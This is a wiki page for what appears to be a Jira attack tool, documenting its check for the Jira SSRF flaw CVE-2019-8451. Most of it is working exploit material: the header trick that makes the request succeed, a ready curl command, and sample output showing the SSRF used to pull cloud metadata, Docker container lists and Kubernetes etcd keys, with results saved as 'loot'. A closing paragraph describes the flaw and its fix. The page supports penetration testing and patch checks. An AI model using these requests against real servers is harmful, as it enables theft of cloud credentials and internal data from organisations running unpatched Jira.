CVE‐2019‐8451 - carnal0wnage/J-PWN GitHub Wiki
Category: [SSRF]
[CG] The secret sauce for this is needing to add the X-Atlassian-token:no-check to the headers and dropping the http(s) after the @ symbol
module name: check_cve_2019_8451
url: plugins/servlet/gadgets/makeRequest?url=http://JIRAJIRA:[email protected]
VULN
INFO: Checking for CVE-2019-8451 (SSRF)
[Testing URL]: http://JIRAJIRA:8080/plugins/servlet/gadgets/makeRequest?url=http://JIRAJIRA:[email protected]
[!!] [SSRF] Vulnerable to CVE-2019-8451 (SSRF): http://JIRAJIRA:8080/plugins/servlet/gadgets/makeRequest?url=http://JIRAJIRA:[email protected]
Checking AWS Metadata
----> AWS Metadata Not Found HTTP:500
----> HTTP Code: 200
throw 1; < don't be evil' >{"http://JIRAJIRA:[email protected]/latest/meta-data/":{"rc":500,"headers":{},"body":""}}
Checking Alibaba Metadata
----> Alibaba Metadata Found: http://JIRAJIRA:8080/plugins/servlet/gadgets/makeRequest?url=http://JIRAJIRA:[email protected]/latest/meta-data/
Checking Docker Containers
----> Docker Containers Not Found HTTP:500
----> HTTP Code: 200
throw 1; < don't be evil' >{"http://JIRAJIRA:[email protected]:2375/v1.24/containers/json":{"rc":500,"headers":{},"body":""}}
Checking Kubernetes ETCD API keys
----> Kubernetes ETCD API keys Not Found HTTP:500
----> HTTP Code: 200
throw 1; < don't be evil' >{"http://JIRAJIRA:[email protected]:2379/v2/keys/?recursive=true":{"rc":500,"headers":{},"body":""}}
Checking Digital Ocean Metadata
----> Digital Ocean Metadata Not Found HTTP:500
----> HTTP Code: 200
throw 1; < don't be evil' >{"http://JIRAJIRA:[email protected]/metadata/v1.json":{"rc":500,"headers":{},"body":""}}
Exfiltrated data written to: loot/CVE-2019-8451_JIRAJIRA:8080.txt
NOT VULN
INFO: Checking for CVE-2019-8451 (SSRF)
[Testing URL]: https://JIRASERVER/jira/plugins/servlet/gadgets/makeRequest?url=https://JIRASERVER:[email protected]
- Not Vulnerable to CVE-2019-8451
- HTTP Code: 200
- Response Body (helpful to debug): throw 1; < don't be evil' >{"https://JIRASERVER/[email protected]":{"rc":403,"headers":{},"body":"Requests to https://JIRASERVER/[email protected] are not allowed. See your administrator about configuring a whitelist entry for this destination (http://confluence.atlassian.com/x/KQfCDQ )."}}
INFO: Checking for CVE-2019-8451 (SSRF)
[Testing URL]: https://JIRA:443/plugins/servlet/gadgets/makeRequest?url=https://JIRA:[email protected]
- Not Vulnerable to CVE-2019-8451
- HTTP Code: 200
curl -k -v 'https://JIRA:443/plugins/servlet/gadgets/makeRequest?url=https://JIRA:[email protected]' -H $'X-Atlassian-token:no-check'
* Request completely sent off
< HTTP/1.1 200
< X-AREQUESTID: 103x20173075x2
< X-ASEN: SEN-9594476
< Set-Cookie: atlassian.xsrf.token=BT7X-UFIE-023N-5LRQ|9f59b3cbfc16d06f4d68ee0a9b6c0b33a1894dcf|lout;path=/
< X-AUSERNAME: anonymous
< X-Content-Type-Options: nosniff
< Expires: Mon, 06 Jan 2025 01:43:42 GMT
< Cache-Control: public,max-age=3600
< Content-Disposition: attachment;filename=p.txt
< Content-Type: application/json;charset=UTF-8
< Content-Length: 102
< Date: Mon, 06 Jan 2025 00:43:42 GMT
< Set-Cookie: BIGipServerjira-ng-pub.app~jira-ng-pub_pool=REMOVED;
< path=/; Httponly; Secure
< Vary: Accept-Encoding
<
* Connection #0 to host JIRA left intact
throw 1; < don't be evil' >{"https://JIRA:[email protected]":{"rc":500,"headers":{},"body":""}}%
Curl string to check
curl -k -v 'http://IP_OR_HOSTNAME:8080/plugins/servlet/gadgets/makeRequest?url=http://IP_OR_HOSTNAME:[email protected]' -H $'X-Atlassian-token:no-check'
we are looking for the {"rc":200,"headers":{},"body":"<!doctype html>\n<html>\n<head>\n <title>Example Domain<\/title>\ in the returned text
Description
The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
Important Note: The patch is deployed in fix versions and later by configuring the Jira URL allow list. N.B: The allowlist is enabled by default (without any URL's defined). However the fixed versions will be vulnerable if allowlist is disabled by the administrator.
References: